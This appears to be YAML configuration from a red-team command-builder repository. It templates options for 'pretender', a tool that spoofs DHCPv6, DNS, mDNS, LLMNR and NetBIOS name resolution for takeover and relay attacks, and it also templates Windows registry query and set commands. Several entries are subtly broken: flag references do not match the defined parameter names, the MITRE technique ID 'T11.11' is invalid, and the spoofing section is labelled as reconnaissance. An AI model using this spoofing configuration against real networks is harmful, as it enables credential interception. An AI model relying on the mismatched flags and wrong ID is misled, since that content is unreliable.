https://github.com/RedTeamPentesting/pretender 2 | name: pretender 3 | languages: 4 | - name: EXE 5 | prefix: pretender.exe 6 | params: 7 | # Section containing relevant parameters 8 | - name: interfaceString 9 | description: 
'Interface to bind on, supports auto-detection by IPv4 or IPv6' 10 | template: "-i {0}" 11 | optional: false 12 | type: text 13 | default: '' 14 | 15 | - name: ip4Ip 16 | description: 'Relay IPv4 address with which queries are answered, supports auto-detection by interface or IPv6' 17 | template: "-4 {0}" 18 | optional: true 19 | selected: false 20 | type: text 21 | default: '' 22 | 23 | - name: ip6Ip 24 | description: 'Relay IPv6 address with which queries are answered, supports auto-detection by interface or IPv4' 25 | template: "-6 {0}" 26 | optional: true 27 | selected: false 28 | type: text 29 | default: '' 30 | 31 | - name: soaHostnameString 32 | description: 'Hostname for the SOA record (useful for Kerberos relaying)' 33 | template: "--soa-hostname {0}" 34 | optional: true 35 | selected: false 36 | type: text 37 | default: '' 38 | 39 | - name: spoofStrings 40 | description: 'Only spoof these domains, if domain starts with a dot, all subdomains with match (allowlist)' 41 | template: "--spoof {0}" 42 | optional: true 43 | selected: false 44 | type: text 45 | default: '' 46 | 47 | - name: dontSpoofStrings 48 | description: 'Do not spoof these domains, if domain starts with a dot, all subdomains with match (blocklist)' 49 | template: "--dont-spoof {0}" 50 | optional: true 51 | selected: false 52 | type: text 53 | default: '' 54 | 55 | - name: spoofForHosts 56 | description: 'Only spoof DHCPv6 and name resolution for these hosts (allowlist of IPs or hostnames)' 57 | template: "--spoof-for {0}" 58 | optional: true 59 | selected: false 60 | type: text 61 | default: '' 62 | 63 | - name: dontSpoofForHosts 64 | description: 'Do not spoof DHCPv6 and name resolution for these hosts (blocklist of IPs or hostnames)' 65 | template: "--dont-spoof-for {0}" 66 | optional: true 67 | selected: false 68 | type: text 69 | default: '' 70 | 71 | - name: spoofTypesTypes 72 | description: 'Only spoof these query types (A, AAA, ANY, SOA, all types are spoofed if empty)' 73 | template: 
"--spoof-types {0}" 74 | optional: true 75 | selected: false 76 | type: text 77 | default: '' 78 | 79 | - name: ttlDuration 80 | description: 'Time to live for name resolution responses (default 1m0s)' 81 | template: "--ttl {0}" 82 | optional: true 83 | selected: false 84 | type: text 85 | default: '1m' 86 | 87 | - name: leaseLifetimeDuration 88 | description: 'DHCPv6 IP lease lifetime (default 1m0s)' 89 | template: "--lease-lifetime {0}" 90 | optional: true 91 | selected: false 92 | type: text 93 | default: '1m' 94 | 95 | - name: routerLifetimeDuration 96 | description: 'Router lifetime specified in router advertisements (default 3m0s)' 97 | template: "--router-lifetime {0}" 98 | optional: true 99 | selected: false 100 | type: text 101 | default: '3m' 102 | 103 | - name: raPeriodDuration 104 | description: 'Time period between router advertisements (default 3m0s)' 105 | template: "--ra-period {0}" 106 | optional: true 107 | selected: false 108 | type: text 109 | default: '3m' 110 | 111 | - name: stopAfterDuration 112 | description: 'Stop running after this duration' 113 | template: "--stop-after duration {0}" 114 | optional: true 115 | selected: false 116 | type: text 117 | default: '' 118 | 119 | - name: noTimestamps 120 | description: 'Disables timestamps in the output' 121 | template: "--no-timestamps" 122 | optional: true 123 | selected: false 124 | type: text 125 | default: '' 126 | 127 | - name: logFile 128 | description: 'Log file name' 129 | template: "--log {0}" 130 | optional: true 131 | selected: false 132 | type: text 133 | default: '' 134 | 135 | - name: Flags 136 | type: label 137 | 138 | - name: noDhcpDns 139 | description: 'Disable DHCPv6 DNS takeover attack (DHCPv6 and DNS)' 140 | template: "--no-dhcp-dns" 141 | optional: true 142 | selected: false 143 | type: flag 144 | 145 | - name: noDhcp 146 | description: 'Disable DHCPv6 spoofing' 147 | template: "--no-dhcp" 148 | optional: true 149 | selected: false 150 | type: flag 151 | 152 | - name: noDns 
153 | description: 'Disable DNS spoofing' 154 | template: "--no-dns" 155 | optional: true 156 | selected: false 157 | type: flag 158 | 159 | - name: noRa 160 | description: 'Disable router advertisements' 161 | template: "--no-ra" 162 | optional: true 163 | selected: false 164 | type: flag 165 | 166 | - name: noMdns 167 | description: 'Disable mDNS spoofing' 168 | template: "--no-mdns" 169 | optional: true 170 | selected: false 171 | type: flag 172 | 173 | - name: noNetbios 174 | description: 'Disable NetBIOS-NS spoofing' 175 | template: "--no-netbios" 176 | optional: true 177 | selected: false 178 | type: flag 179 | 180 | - name: noLlmnr 181 | description: 'Disable LLMNR spoofing' 182 | template: "--no-llmnr" 183 | optional: true 184 | selected: false 185 | type: flag 186 | 187 | - name: noLnr 188 | description: 'Disable local name resolution spoofing (mDNS, LLMNR, NetBIOS-NS)' 189 | template: "--no-lnr" 190 | optional: true 191 | selected: false 192 | type: flag 193 | 194 | - name: noIpv6Lnr 195 | description: 'Disable mDNS and LLMNR via IPv6 (useful with allowlist or blocklist)' 196 | template: "--no-ipv6-lnr" 197 | optional: true 198 | selected: false 199 | type: flag 200 | 201 | - name: ignoreNofqdn 202 | description: 'Ignore DHCPv6 messages where the client did not include its FQDN (useful with allowlist or blocklists)' 203 | template: "--ignore-nofqdn" 204 | optional: true 205 | selected: false 206 | type: flag 207 | 208 | - name: verbose 209 | description: 'Print debug information' 210 | template: "--verbose" 211 | optional: true 212 | selected: false 213 | type: flag 214 | 215 | - name: noColor 216 | description: Disables output styling 217 | type: flag 218 | value: "--no-color" 219 | optional: true 220 | selected: false 221 | 222 | - name: noHostInfo 223 | description: Do not gather host information 224 | type: flag 225 | value: "--no-host-info" 226 | optional: true 227 | selected: false 228 | 229 | - name: hideIgnored 230 | description: 'Do not log 
ignored queries' 231 | template: "--hide-ignored" 232 | optional: true 233 | selected: false 234 | type: flag 235 | 236 | - name: redirectStderr 237 | description: 'Redirect stderr to stdout' 238 | template: "--redirect-stderr" 239 | optional: true 240 | selected: false 241 | type: flag 242 | 243 | sections: 244 | 245 | - name: Local name resolution spoofing 246 | labels: ['Recon'] # Relevant labels for filtering 247 | mitre: 'T11.11' # Mitre relevant technique 248 | verb: '' # Verb that 249 | required_flags: [interfaceString] # Will reflect required params for command 250 | optional_flags: [ 251 | noColor, 252 | ip4Ip, 253 | ip6Ip, 254 | soaHostnameString, 255 | noDhcpDns, 256 | noDhcp, 257 | noDns, 258 | noRa, 259 | noMdns, 260 | noNetbios, 261 | noLlmnr, 262 | noLnr, 263 | noIpv6Lnr, 264 | spoofStrings, 265 | dontSpoofStrings, 266 | spoofforHosts, 267 | dontSpoofForHosts, 268 | spoofTypesTypes, 269 | ignoreNofqdn, 270 | ttlDuration, 271 | leaseLifetimeDuration, 272 | routerLifetimeDuration, 273 | raPeriodDuration, 274 | stopAfterDuration, 275 | verbose, 276 | noColor, 277 | logFile, 278 | noHostInfo, 279 | hideIgnored, 280 | redirect-stderr 281 | ] # Will contain any optional params for command 282 | 283 | - name: List interfaces and their addresses (the other options have no effect, except for --no-color) 284 | labels: ['Recon'] # Relevant labels for filtering 285 | mitre: '' # Mitre relevant technique 286 | verb: '--interfaces' # Verb that 287 | required_flags: [] # Will reflect required params for command 288 | optional_flags: [noColor] # Will contain any optional params for command 289 | 290 | - name: Only logs incoming queries and does not answer any of them 291 | labels: ['Recon'] # Relevant labels for filtering 292 | mitre: '' # Mitre relevant technique 293 | verb: '--dry' # Verb that 294 | required_flags: [ 295 | interfaceString 296 | ] # Will reflect required params for command 297 | optional_flags: [ 298 | noColor, 299 | ip4Ip, 300 | ip6Ip, 301 | 
soaHostnameString, 302 | noDhcpDns, 303 | noDhcp, 304 | no-dns, 305 | noRa, 306 | noMdns, 307 | noNetbios, 308 | noLlmnr, 309 | noLnr, 310 | noIpv6Lnr, 311 | spooftrings, 312 | dontSpoofStrings, 313 | spoofForHosts, 314 | dontSpoofForHosts, 315 | spoofTypesTypes, 316 | ignoreNofqdn, 317 | ttlDuration, 318 | leaseLifetimeDuration, 319 | routerLifetimeDuration, 320 | raPeriodDuration, 321 | stopAfterDuration, 322 | verbose, 323 | noColor, 324 | logFile, 325 | noHostInfo, 326 | hideIgnored, 327 | redirectStderr 328 | ] # Will contain any optional params for command 329 | 330 | - name: Self crafted 331 | labels: [] 332 | mitre: '' 333 | verb: '' 334 | required_flags: [ 335 | interfaceString 336 | ] 337 | optional_flags: [ 338 | ip4Ip, 339 | ip6Ip, 340 | soaHostnameString, 341 | spoofStrings, 342 | dontSpoofStrings, 343 | spoofForHosts, 344 | dontSpoofForHosts, 345 | spoofTypesTypes, 346 | ttlDuration, 347 | leaseLifetimeDuration, 348 | routerLifetimeDuration, 349 | raPeriodDuration, 350 | stopAfterDuration, 351 | noTimestamps, 352 | logFile, 353 | Flags, 354 | noDhcpDns, 355 | noDhcp, 356 | noDns, 357 | noRa, 358 | noMdns, 359 | noNetbios, 360 | noLlmnr, 361 | noLnr, 362 | noIpv6Lnr, 363 | ignoreNofqdn, 364 | verbose, 365 | noColor , 366 | noHostInfo, 367 | hideIgnored, 368 | redirectStderr 369 | ] -------------------------------------------------------------------------------- /commands/reg.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | params: 3 | - name: Path 4 | description: Registry path 5 | - name: Value 6 | description: Registry key value 7 | - name: Data 8 | description: Registry key data 9 | - name: Type 10 | description: Registry key type 11 | sections: 12 | - name: Query registry 13 | labels: [] 14 | commands: 15 | - language: EXE 16 | command: reg query {{Path}} 17 | - name: Query registry specific value 18 | labels: [] 19 | commands: 20 | - language: EXE 21 | command: reg query {{Path}} /v {{Value}} 22 | 
- name: Set registry value 23 | labels: [] 24 | commands: 25 | - language: EXE 26 | command: reg add {{Path}} /v {{Value}} /t {{Type}} /d {{Data}} /f 27 | --------------------------------------------------------------------------------